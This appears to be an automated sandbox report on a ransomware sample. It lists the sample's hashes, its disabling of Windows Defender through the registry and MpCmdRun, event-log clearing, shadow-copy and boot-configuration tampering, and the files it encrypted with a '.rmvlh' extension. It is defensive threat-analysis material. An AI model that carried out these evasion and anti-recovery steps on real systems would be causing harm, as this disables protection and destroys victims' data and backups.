Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
13-01-2022 13:29
Static task
static1
Behavioral task
behavioral1
Sample
edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe
Resource
win10-en-20211208
General
-
Target
edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe
-
Size
2.6MB
-
MD5
6a998dc6f975da2f4e88849b03b34b13
-
SHA1
56f7fea05977ed3a4b1b6fed4713a56008669e4b
-
SHA256
edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050
-
SHA512
8c4ade656335d3f9ca575bfb615f8cb36107bf5cbd5c47070e97a2818953062619d06dd03a911d5f4e176709273580e1d2370da6ff5cdb555ac42e1ed09a468b
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1656 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 556 bcdedit.exe 616 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14830_.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_q8naHqLas7k0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Athens.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_fBAKzovnsMc0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\oledb32r.dll.mui edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01954_.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_tBgdxKYvZEs0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\GostName.XSL.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_O3Zq2CDkm-M0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BOATINST.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_32nebOUrjb40.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGWEBPQT.DPV.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_Dmy7tNSWpx00.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\js\library.js edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_NMsrl_Powi00.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\PUSH.WAV.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_gntmRNGXg-E0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\triangle.png edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0215070.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_g7jrEEhBoTY0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107452.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_XNQIUHn9Q8w0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SlateBlue.css.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_hUqN8yxxYhI0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-backglow.png edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\ARFR\MSB1ARFR.ITS.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_lXVbhvT6vSo0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\TAB_OFF.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_6WiCfMVwoL80.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10299_.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_E-uhKTAXjBc0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMEE.CFG.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_ZtfLuxpM_XE0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_GG3mSPak3s80.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_Qzx-fxquskA0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_eX_uxGJFv140.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_XMiiT1NLyTU0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_MyeNg9QChRg0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15171_.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_LhnPkkALBf80.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\SHOT.WAV.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_5PVqa109Xp00.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL111.XML.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_na7NyQQ5jdc0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_rainy.png edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Backgammon\en-US\bckgzm.exe.mui.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_2HXho5P3Gl80.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_MVcAMbeE5DQ0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_a6fwT4Kt7IM0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107488.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_acye6FqJznI0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME02.CSS.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_YN-fGXEFsWQ0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\chapters-static.png edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_ocQJUK7c0n40.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Generic.gif.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_bhBwqbaa8bc0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00693_.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_vXB9HTNA8m40.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Slipstream.xml.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_0c3y7VMLSkU0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Krasnoyarsk.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_bkVO1BQVLrQ0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15134_.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_pUrJmlMFCN40.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.htm edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_gmV0juBTptc0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_eMQb2y2Hopo0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\settings.html edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_2Rw-2MPJofs0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18206_.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_stjNgnZoEX00.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Monrovia.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_f5OvBs_qv3M0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_jKmBN4eI06M0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_l79V25HqI8Y0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\rtscom.dll.mui edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_C-ixsYGeRAo0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis\TAB_ON.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH__lgWEmOmrNs0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\settings.html edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_23BAO480mQA0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\gadget.xml edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239191.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_-V3hhvSTVu80.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Adobe.css.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_IOwcWBH1I_c0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_5HG9nCJhnpo0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1960 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exeedf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exepid process 1840 powershell.exe 2096 powershell.exe 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1480 wevtutil.exe Token: SeBackupPrivilege 1480 wevtutil.exe Token: SeSecurityPrivilege 1908 wevtutil.exe Token: SeBackupPrivilege 1908 wevtutil.exe Token: SeSecurityPrivilege 1408 wevtutil.exe Token: SeBackupPrivilege 1408 wevtutil.exe Token: SeIncreaseQuotaPrivilege 276 wmic.exe Token: SeSecurityPrivilege 276 wmic.exe Token: SeTakeOwnershipPrivilege 276 wmic.exe Token: SeLoadDriverPrivilege 276 wmic.exe Token: SeSystemProfilePrivilege 276 wmic.exe Token: SeSystemtimePrivilege 276 wmic.exe Token: SeProfSingleProcessPrivilege 276 wmic.exe Token: SeIncBasePriorityPrivilege 276 wmic.exe Token: SeCreatePagefilePrivilege 276 wmic.exe Token: SeBackupPrivilege 276 wmic.exe Token: SeRestorePrivilege 276 wmic.exe Token: SeShutdownPrivilege 276 wmic.exe Token: SeDebugPrivilege 276 wmic.exe Token: SeSystemEnvironmentPrivilege 276 wmic.exe Token: SeRemoteShutdownPrivilege 276 wmic.exe Token: SeUndockPrivilege 276 wmic.exe Token: SeManageVolumePrivilege 276 wmic.exe Token: 33 276 wmic.exe Token: 34 276 wmic.exe Token: 35 276 wmic.exe Token: SeIncreaseQuotaPrivilege 1660 wmic.exe Token: SeSecurityPrivilege 1660 wmic.exe Token: SeTakeOwnershipPrivilege 1660 wmic.exe Token: SeLoadDriverPrivilege 1660 wmic.exe Token: SeSystemProfilePrivilege 1660 wmic.exe Token: SeSystemtimePrivilege 1660 wmic.exe Token: SeProfSingleProcessPrivilege 1660 wmic.exe Token: SeIncBasePriorityPrivilege 1660 wmic.exe Token: SeCreatePagefilePrivilege 1660 wmic.exe Token: SeBackupPrivilege 1660 wmic.exe Token: SeRestorePrivilege 1660 wmic.exe Token: SeShutdownPrivilege 1660 wmic.exe Token: SeDebugPrivilege 1660 wmic.exe Token: SeSystemEnvironmentPrivilege 1660 wmic.exe Token: SeRemoteShutdownPrivilege 1660 wmic.exe Token: SeUndockPrivilege 1660 wmic.exe Token: SeManageVolumePrivilege 1660 wmic.exe Token: 33 1660 wmic.exe Token: 34 1660 wmic.exe Token: 35 1660 wmic.exe Token: SeIncreaseQuotaPrivilege 1660 wmic.exe Token: SeSecurityPrivilege 1660 wmic.exe Token: SeTakeOwnershipPrivilege 1660 wmic.exe Token: SeLoadDriverPrivilege 1660 wmic.exe Token: SeSystemProfilePrivilege 1660 wmic.exe Token: SeSystemtimePrivilege 1660 wmic.exe Token: SeProfSingleProcessPrivilege 1660 wmic.exe Token: SeIncBasePriorityPrivilege 1660 wmic.exe Token: SeCreatePagefilePrivilege 1660 wmic.exe Token: SeBackupPrivilege 1660 wmic.exe Token: SeRestorePrivilege 1660 wmic.exe Token: SeShutdownPrivilege 1660 wmic.exe Token: SeDebugPrivilege 1660 wmic.exe Token: SeSystemEnvironmentPrivilege 1660 wmic.exe Token: SeRemoteShutdownPrivilege 1660 wmic.exe Token: SeUndockPrivilege 1660 wmic.exe Token: SeManageVolumePrivilege 1660 wmic.exe Token: 33 1660 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 964 wrote to memory of 1884 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 964 wrote to memory of 1884 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 964 wrote to memory of 1884 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 1884 wrote to memory of 460 1884 net.exe net1.exe PID 1884 wrote to memory of 460 1884 net.exe net1.exe PID 1884 wrote to memory of 460 1884 net.exe net1.exe PID 964 wrote to memory of 1312 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 964 wrote to memory of 1312 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 964 wrote to memory of 1312 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 1312 wrote to memory of 1256 1312 net.exe net1.exe PID 1312 wrote to memory of 1256 1312 net.exe net1.exe PID 1312 wrote to memory of 1256 1312 net.exe net1.exe PID 964 wrote to memory of 1832 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 964 wrote to memory of 1832 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 964 wrote to memory of 1832 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 1832 wrote to memory of 1348 1832 net.exe net1.exe PID 1832 wrote to memory of 1348 1832 net.exe net1.exe PID 1832 wrote to memory of 1348 1832 net.exe net1.exe PID 964 wrote to memory of 1272 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 964 wrote to memory of 1272 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 964 wrote to memory of 1272 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 1272 wrote to memory of 1820 1272 net.exe net1.exe PID 1272 wrote to memory of 1820 1272 net.exe net1.exe PID 1272 wrote to memory of 1820 1272 net.exe net1.exe PID 964 wrote to memory of 864 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 964 wrote to memory of 864 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 964 wrote to memory of 864 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 864 wrote to memory of 1976 864 net.exe net1.exe PID 864 wrote to memory of 1976 864 net.exe net1.exe PID 864 wrote to memory of 1976 864 net.exe net1.exe PID 964 wrote to memory of 1972 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 964 wrote to memory of 1972 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 964 wrote to memory of 1972 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 1972 wrote to memory of 1960 1972 net.exe net1.exe PID 1972 wrote to memory of 1960 1972 net.exe net1.exe PID 1972 wrote to memory of 1960 1972 net.exe net1.exe PID 964 wrote to memory of 1356 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 964 wrote to memory of 1356 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 964 wrote to memory of 1356 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 1356 wrote to memory of 1552 1356 net.exe net1.exe PID 1356 wrote to memory of 1552 1356 net.exe net1.exe PID 1356 wrote to memory of 1552 1356 net.exe net1.exe PID 964 wrote to memory of 1616 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 964 wrote to memory of 1616 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 964 wrote to memory of 1616 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 1616 wrote to memory of 744 1616 net.exe net1.exe PID 1616 wrote to memory of 744 1616 net.exe net1.exe PID 1616 wrote to memory of 744 1616 net.exe net1.exe PID 964 wrote to memory of 1640 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 964 wrote to memory of 1640 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 964 wrote to memory of 1640 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 964 wrote to memory of 968 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 964 wrote to memory of 968 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 964 wrote to memory of 968 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 964 wrote to memory of 1472 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 964 wrote to memory of 1472 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 964 wrote to memory of 1472 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 964 wrote to memory of 1736 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 964 wrote to memory of 1736 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 964 wrote to memory of 1736 964 